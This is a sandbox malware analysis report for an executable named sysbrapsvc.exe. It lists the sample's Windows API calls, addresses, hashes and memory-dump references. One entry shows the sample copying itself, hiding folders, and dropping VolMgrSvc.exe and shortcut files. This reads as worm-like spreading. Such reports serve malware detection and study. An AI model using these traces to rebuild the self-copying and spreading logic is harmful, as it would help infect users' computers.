                                                                                • Opcode ID: cdfbb7bf72505eeb15b37c34f8babcdeb414b79efb373e01c93ed64440f99f30
                                                                                • Instruction ID: 4f272ba0ccffe3418a14e21f7fbe91cca6632783ddd3ea8ee3177eefa107642c
                                                                                • Opcode Fuzzy Hash: cdfbb7bf72505eeb15b37c34f8babcdeb414b79efb373e01c93ed64440f99f30
                                                                                • Instruction Fuzzy Hash: EB110DB5900108BFCB04DF98D945E9EB7B5EF48304F14C1A9FD19AB342D635EA11CBA6
                                                                                APIs
                                                                                • socket.WS2_32(00000002,00000001,00000006), ref: 0040D283
                                                                                • htons.WS2_32(00009E34), ref: 0040D2B5
                                                                                • connect.WS2_32(000000FF,?,00000010), ref: 0040D2CF
                                                                                  • Part of subcall function 0040AFF0: shutdown.WS2_32(0040AFDD,00000002), ref: 0040AFF9
                                                                                  • Part of subcall function 0040AFF0: closesocket.WS2_32(0040AFDD), ref: 0040B003
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: closesocketconnecthtonsshutdownsocket
                                                                                • String ID:
                                                                                • API String ID: 1987800339-0
                                                                                • Opcode ID: ad00b5e66e502cf51556e2fe0723fe5a46734f1a748e3451fb2f35000b259efe
                                                                                • Instruction ID: 6f27e87c9fbd885ae8dc1ff0d2584d57f1b5bd556a0886c013ee5925ca4f0c28
                                                                                • Opcode Fuzzy Hash: ad00b5e66e502cf51556e2fe0723fe5a46734f1a748e3451fb2f35000b259efe
                                                                                • Instruction Fuzzy Hash: 75110C74D05209EBCF14DFE8DA09AAEB774AF08320F2042ADE525A73D0E7748F05975A
                                                                                APIs
                                                                                  • Part of subcall function 0040A300: GetCurrentProcessId.KERNEL32(?,0040A26B,?,0040CB7E,00000010,?,?,?,?,?,?,0040C8EB), ref: 0040A303
                                                                                • HeapCreate.KERNELBASE(00000000,00000000,00000000,?,?,0040A277,?,0040CB7E,00000010,?,?,?,?,?,?,0040C8EB), ref: 0040A34C
                                                                                • HeapSetInformation.KERNEL32(02260000,00000000,00000002,00000004), ref: 0040A376
                                                                                • GetCurrentProcessId.KERNEL32 ref: 0040A37C
                                                                                  • Part of subcall function 0040A390: GetProcessHeaps.KERNEL32(000000FF,?), ref: 0040A3AC
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$CurrentHeap$CreateHeapsInformation
                                                                                • String ID:
                                                                                • API String ID: 3179415709-0
                                                                                • Opcode ID: 39a68b1a461fe85ff5420ab9e490a0acce4aa907e117fd060a557965e8062ddb
                                                                                • Instruction ID: 153581d20db94d5c309eff678e55c8914b1996f7dedd943f89312b8a2df68ea8
                                                                                • Opcode Fuzzy Hash: 39a68b1a461fe85ff5420ab9e490a0acce4aa907e117fd060a557965e8062ddb
                                                                                • Instruction Fuzzy Hash: C4F096B0581318ABD314DB61BC05B663B75B704305F14C53AF9099A2D1EBB9D824C75B
                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(00406B80,80000000,00000001,00000000,00000003,00000000,00000000,00406B80), ref: 0040EC40
                                                                                • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040EC55
                                                                                • FindCloseChangeNotification.KERNELBASE(000000FF), ref: 0040EC62
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$ChangeCloseCreateFindNotificationSize
                                                                                • String ID:
                                                                                • API String ID: 4178644524-0
                                                                                • Opcode ID: df23a932ebc1e553a736a6907ae04855c01650ef694a25ef55576e6386c5cc64
                                                                                • Instruction ID: 510e37a00670102d9d314512819d27ba5470aa4876814cd41fcb5fcea3dff8ee
                                                                                • Opcode Fuzzy Hash: df23a932ebc1e553a736a6907ae04855c01650ef694a25ef55576e6386c5cc64
                                                                                • Instruction Fuzzy Hash: CEF01274A40308FBDB10DFA4DD49B8DBB74AB04701F208155FA04B72D0D6B55A508B44
                                                                                APIs
                                                                                  • Part of subcall function 0040A300: GetCurrentProcessId.KERNEL32(?,0040A26B,?,0040CB7E,00000010,?,?,?,?,?,?,0040C8EB), ref: 0040A303
                                                                                • RtlAllocateHeap.NTDLL(02260000,?,-0000000C), ref: 0040A2AA
                                                                                • memset.NTDLL ref: 0040A2E4
                                                                                  • Part of subcall function 0040A320: HeapCreate.KERNELBASE(00000000,00000000,00000000,?,?,0040A277,?,0040CB7E,00000010,?,?,?,?,?,?,0040C8EB), ref: 0040A34C
                                                                                  • Part of subcall function 0040A320: HeapSetInformation.KERNEL32(02260000,00000000,00000002,00000004), ref: 0040A376
                                                                                  • Part of subcall function 0040A320: GetCurrentProcessId.KERNEL32 ref: 0040A37C
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$CurrentProcess$AllocateCreateInformationmemset
                                                                                • String ID:
                                                                                • API String ID: 3494217179-0
                                                                                • Opcode ID: 294fda0ab172e2a004a74a08390490f5fc4b4b9dca16f8036860c8ce0df5ca3a
                                                                                • Instruction ID: ba70c5eae7cf01fb33dfd467849f4f34152d1a70f2116d5db6fbc7e10e676d17
                                                                                • Opcode Fuzzy Hash: 294fda0ab172e2a004a74a08390490f5fc4b4b9dca16f8036860c8ce0df5ca3a
                                                                                • Instruction Fuzzy Hash: F5110375900208BBCB14DFE5D845F9E7BB9AF44308F04C1BDE909A7381D6399A54CB99
                                                                                APIs
                                                                                  • Part of subcall function 004013B0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,0040DA0D,00000000), ref: 004013D5
                                                                                  • Part of subcall function 004013B0: socket.WS2_32(00000002,00000002,00000011), ref: 004013E4
                                                                                  • Part of subcall function 004013B0: bind.WS2_32(?,?,00000010), ref: 00401429
                                                                                  • Part of subcall function 0040B6B0: EnterCriticalSection.KERNEL32(0041AE68,?,?,0040D369), ref: 0040B6C0
                                                                                  • Part of subcall function 0040B6B0: LeaveCriticalSection.KERNEL32(0041AE68,?,?,0040D369), ref: 0040B6EC
                                                                                • InterlockedExchangeAdd.KERNEL32(00000000,00000000), ref: 0040DA2D
                                                                                • WaitForSingleObject.KERNEL32(000005F4,00001388), ref: 0040DA77
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$CreateEnterEventExchangeInterlockedLeaveObjectSingleWaitbindsocket
                                                                                • String ID:
                                                                                • API String ID: 3920643007-0
                                                                                • Opcode ID: 5c77e3d312ad578ce08815b2cc1e62ae5db3b44bec38e6a5e784731c17f989e3
                                                                                • Instruction ID: aa17d1baa4e02fc33eb62529aa3b01015a1e888eeffea948add3cca91325e381
                                                                                • Opcode Fuzzy Hash: 5c77e3d312ad578ce08815b2cc1e62ae5db3b44bec38e6a5e784731c17f989e3
                                                                                • Instruction Fuzzy Hash: 3711A5B5E00208ABE700EBE0DC46BAF7734EB44704F10847AF501772D1E6759A40CB99
                                                                                APIs
                                                                                • gethostname.WS2_32(?,00000100), ref: 0040B29C
                                                                                • gethostbyname.WS2_32(?), ref: 0040B2AE
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: gethostbynamegethostname
                                                                                • String ID:
                                                                                • API String ID: 3961807697-0
                                                                                • Opcode ID: aaec8b9e3ccfd23335778a95738de583a013869622460b5e30cdc36053fb7845
                                                                                • Instruction ID: 8039f9734a4788e95ef973f6647f821cba33223e1e4c036a543b3ae581dc98b8
                                                                                • Opcode Fuzzy Hash: aaec8b9e3ccfd23335778a95738de583a013869622460b5e30cdc36053fb7845
                                                                                • Instruction Fuzzy Hash: B6112E34908118CBCB24CB14C848BD8B775EB65314F2486DAD88967390C7F9ADC5CF89
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: gethostbynameinet_addr
                                                                                • String ID:
                                                                                • API String ID: 1594361348-0
                                                                                • Opcode ID: c33f327bb9ec7267db1a3eace16e79cfc334ac04858cae8989207d18368f1188
                                                                                • Instruction ID: a26dc96a0067a2b43ac3d3d1c1b84107ed873affba9b2e0c5737def7be7f7e0e
                                                                                • Opcode Fuzzy Hash: c33f327bb9ec7267db1a3eace16e79cfc334ac04858cae8989207d18368f1188
                                                                                • Instruction Fuzzy Hash: BFF01C78900208EFCB00DFB4E48889DBBB4EB48315F2083AAE905673A0D7709E80DB80
                                                                                APIs
                                                                                • WaitForSingleObject.KERNEL32(000005F4,000003E8), ref: 0040B8DE
                                                                                • InterlockedDecrement.KERNEL32(00419828), ref: 0040B8F0
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DecrementInterlockedObjectSingleWait
                                                                                • String ID:
                                                                                • API String ID: 4086267124-0
                                                                                • Opcode ID: 37923b9e3894ab7ac0eca60294d8a3c153e8bbf32d36ac9aea54317e710ac4f2
                                                                                • Instruction ID: 70371dd39396dacd0ebacc4d3a7253ecf07d8a31bb2bfca86181530dfe316479
                                                                                • Opcode Fuzzy Hash: 37923b9e3894ab7ac0eca60294d8a3c153e8bbf32d36ac9aea54317e710ac4f2
                                                                                • Instruction Fuzzy Hash: 3BD05E3165030897CA006BA1B849B9A360EE710700B108433F240A11D0D7BC88C092EE
                                                                                APIs
                                                                                • shutdown.WS2_32(0040AFDD,00000002), ref: 0040AFF9
                                                                                • closesocket.WS2_32(0040AFDD), ref: 0040B003
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: closesocketshutdown
                                                                                • String ID:
                                                                                • API String ID: 572888783-0
                                                                                • Opcode ID: bfbd7c6bd4046a28b837c812f6aa1fd48043d02f9901879055b44668827d2eb5
                                                                                • Instruction ID: 69ce69260fc8840876d91afc79957fad69f2a54b7a8d7d483856da217b0a501e
                                                                                • Opcode Fuzzy Hash: bfbd7c6bd4046a28b837c812f6aa1fd48043d02f9901879055b44668827d2eb5
                                                                                • Instruction Fuzzy Hash: 04C04C7914120CBBCB049FE5ED4DDD97B6CEB4C651F008494FA098B251CBB6E980CB95
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(0041AE68,?,?,0040D369), ref: 0040B6C0
                                                                                • LeaveCriticalSection.KERNEL32(0041AE68,?,?,0040D369), ref: 0040B6EC
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeave
                                                                                • String ID:
                                                                                • API String ID: 3168844106-0
                                                                                • Opcode ID: bcabc186306ba1e6db95b79a4a5ee2dd95fb67cbb7ec1f120a3790f6e9aeee7b
                                                                                • Instruction ID: 13923c4bd5c8e2331a891100fe08006a79a1a16b838805fb2ea00da725e168b9
                                                                                • Opcode Fuzzy Hash: bcabc186306ba1e6db95b79a4a5ee2dd95fb67cbb7ec1f120a3790f6e9aeee7b
                                                                                • Instruction Fuzzy Hash: 4EE01AB59C2304EBCB05DB88EC49B9977B4E705314F148569F80953390D7BAAE60CA5F
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(0041AE68,?,0040B8A7), ref: 0040B018
                                                                                • LeaveCriticalSection.KERNEL32(0041AE68,?,0040B8A7), ref: 0040B028
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeave
                                                                                • String ID:
                                                                                • API String ID: 3168844106-0
                                                                                • Opcode ID: 1fc6b865b111585f52b158b7dd66f0ac1bdef0efac2574f6e36ae78d8eeb1e27
                                                                                • Instruction ID: 372b615c4b6dbe44d84b2135da3facd6a20cc6bc8964a13371f16c469ac31f8d
                                                                                • Opcode Fuzzy Hash: 1fc6b865b111585f52b158b7dd66f0ac1bdef0efac2574f6e36ae78d8eeb1e27
                                                                                • Instruction Fuzzy Hash: FDB09B715D131877810137D5AC0E7C5362CD550B55F144832F04D500559FEE3490855F
                                                                                APIs
                                                                                  • Part of subcall function 0040A300: GetCurrentProcessId.KERNEL32(?,0040A26B,?,0040CB7E,00000010,?,?,?,?,?,?,0040C8EB), ref: 0040A303
                                                                                • RtlFreeHeap.NTDLL(02260000,00000000,00402612,?,00402612,?), ref: 0040A6BB
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CurrentFreeHeapProcess
                                                                                • String ID:
                                                                                • API String ID: 3855406826-0
                                                                                • Opcode ID: 8534952d8c90e4d700e8dcba1ea12cabe14820986c13acf41758031b57988e10
                                                                                • Instruction ID: 8dad1e0271eeb528323df75ad7ae4a1fb2206e9654044d15681f9d78fe5da1b6
                                                                                • Opcode Fuzzy Hash: 8534952d8c90e4d700e8dcba1ea12cabe14820986c13acf41758031b57988e10
                                                                                • Instruction Fuzzy Hash: 97F0C874900308AFDB04DF94D84096DBF75BF84304F14C1AAE9446B381FA36D951CB96
                                                                                APIs
                                                                                  • Part of subcall function 0040B6B0: EnterCriticalSection.KERNEL32(0041AE68,?,?,0040D369), ref: 0040B6C0
                                                                                  • Part of subcall function 0040B6B0: LeaveCriticalSection.KERNEL32(0041AE68,?,?,0040D369), ref: 0040B6EC
                                                                                • WaitForSingleObject.KERNEL32(000005F4,00001388), ref: 0040D38C
                                                                                  • Part of subcall function 0040CF80: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040CF8C
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterExchangeInterlockedLeaveObjectSingleWait
                                                                                • String ID:
                                                                                • API String ID: 3309573332-0
                                                                                • Opcode ID: 7eb5ed2af1fc3fd9af1decff1ab171505a9aa6000d5c3347444e91febc4f0f1a
                                                                                • Instruction ID: af2a8be1c3b2022afcb85cbb4701cad0209fa058a067ecaf1ca36940e585286a
                                                                                • Opcode Fuzzy Hash: 7eb5ed2af1fc3fd9af1decff1ab171505a9aa6000d5c3347444e91febc4f0f1a
                                                                                • Instruction Fuzzy Hash: 3CE09270E00308E6D714A7A1A806BAF726A9710305F50857AFA007A2C1DA7E994883EE
                                                                                APIs
                                                                                • CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 00407270
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateInstance
                                                                                • String ID:
                                                                                • API String ID: 542301482-0
                                                                                • Opcode ID: c09f913f08406f093c7ac86b5101c5a128e05d7496c9f4ec9220068c62795e96
                                                                                • Instruction ID: d63025b72d2c6ebaad53fa266f334e56fbfbf26be99018a77b0022b5cf711e38
                                                                                • Opcode Fuzzy Hash: c09f913f08406f093c7ac86b5101c5a128e05d7496c9f4ec9220068c62795e96
                                                                                • Instruction Fuzzy Hash: 5FE0C97490120CBFDB40DF90C889B9EBBB8AB08315F1081A9E90467280D7B96A948BA5
                                                                                APIs
                                                                                  • Part of subcall function 004062C0: GetDriveTypeW.KERNELBASE(0040629F), ref: 004062CD
                                                                                • lstrcpyW.KERNEL32(?,?), ref: 004062B3
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DriveTypelstrcpy
                                                                                • String ID:
                                                                                • API String ID: 3664088370-0
                                                                                • Opcode ID: aa744ef504167f27be6d486533275d748dec175d232d96b41b3e61fed09f16a0
                                                                                • Instruction ID: a3f39d1a22dcf836f44b0fbcddd46cfc88cbb50e51ff9e9dfde0dd7881e74902
                                                                                • Opcode Fuzzy Hash: aa744ef504167f27be6d486533275d748dec175d232d96b41b3e61fed09f16a0
                                                                                • Instruction Fuzzy Hash: DCF04975D00208EBCB00EFA4D44579EB7B4EF04304F00C0ADE815AB240E639AB58CB49
                                                                                APIs
                                                                                • _chkstk.NTDLL(?,00406CC0,?,?,?), ref: 00406658
                                                                                • wsprintfW.USER32 ref: 0040668F
                                                                                • wsprintfW.USER32 ref: 004066AF
                                                                                • wsprintfW.USER32 ref: 004066CF
                                                                                • wsprintfW.USER32 ref: 004066EF
                                                                                • wsprintfW.USER32 ref: 00406708
                                                                                • PathFileExistsW.SHLWAPI(?), ref: 00406718
                                                                                • SetFileAttributesW.KERNEL32(?,00000080), ref: 00406751
                                                                                • DeleteFileW.KERNEL32(?), ref: 0040675E
                                                                                • PathFileExistsW.SHLWAPI(?), ref: 0040676B
                                                                                • SetFileAttributesW.KERNEL32(?,00000080), ref: 00406785
                                                                                • DeleteFileW.KERNEL32(?), ref: 00406792
                                                                                • PathFileExistsW.SHLWAPI(?), ref: 0040679F
                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 004067B2
                                                                                • SetFileAttributesW.KERNEL32(?,00000002), ref: 004067C5
                                                                                • PathFileExistsW.SHLWAPI(?), ref: 004067D2
                                                                                • CopyFileW.KERNEL32(C:\Windows\sysbrapsvc.exe,?,00000000), ref: 004067EA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3855923885.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3856023683.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857033201.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3857088317.0000000000419000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_sysbrapsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$wsprintf$ExistsPath$Attributes$Delete$CopyCreateDirectory_chkstk
                                                                                • String ID: %s.lnk$%s\%s$%s\%s$%s\%s$%s\%s$%s\%s\%s$%s\%s\VolMgrSvc.exe$%s\*$C:\Windows\sysbrapsvc.exe$shell32.dll$shell32.dll
                                                                                • API String ID: 2120662298-2075929577
                                                                                • Opcode ID: 9bf2619cef5fba6853ff482bd73d2f59edf810866bcdaa708e9710542ec04caf
                                                                                • Instruction ID: c612be32194b3f0687db5988b06318d9a83eb4d95ba537684b9fbd0309d38362
                                                                                • Opcode Fuzzy Hash: 9bf2619cef5fba6853ff482bd73d2f59edf810866bcdaa708e9710542ec04caf
                                                                                • Instruction Fuzzy Hash: 33D164B5900258ABCB20DF50DC54FEA77B8BB48304F00C5EAF20AA6191D7B99BD4CF59
                                                                                APIs
                                                                                • CreateDirectoryW.KERNEL32(00406AFE,00000000), ref: 0040651F
                                                                                • wsprintfW.USER32 ref: 00406535
                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0040654C
                                                                                • lstrcmpW.KERNEL32(?,00410FC4), ref: 00406571
                                                                                • lstrcmpW.KERNEL32(?,00410FC8), ref: 00406587
                                                                                • wsprintfW.USER32 ref: 004065AA
                                                                                • wsprintfW.USER32 ref: 004065CA
                                                                                • MoveFileExW.KERNEL32(?,?,00000009), ref: 00406606
                                                                                • FindNextFileW.KERNEL32(000000FF,?), ref: 0040661A
                                                                                • FindClose.KERNEL32(000000FF), ref: 0040662F
                                                                                • RemoveDirectoryW.KERNEL32(?), ref: 00406639
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3855988501.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
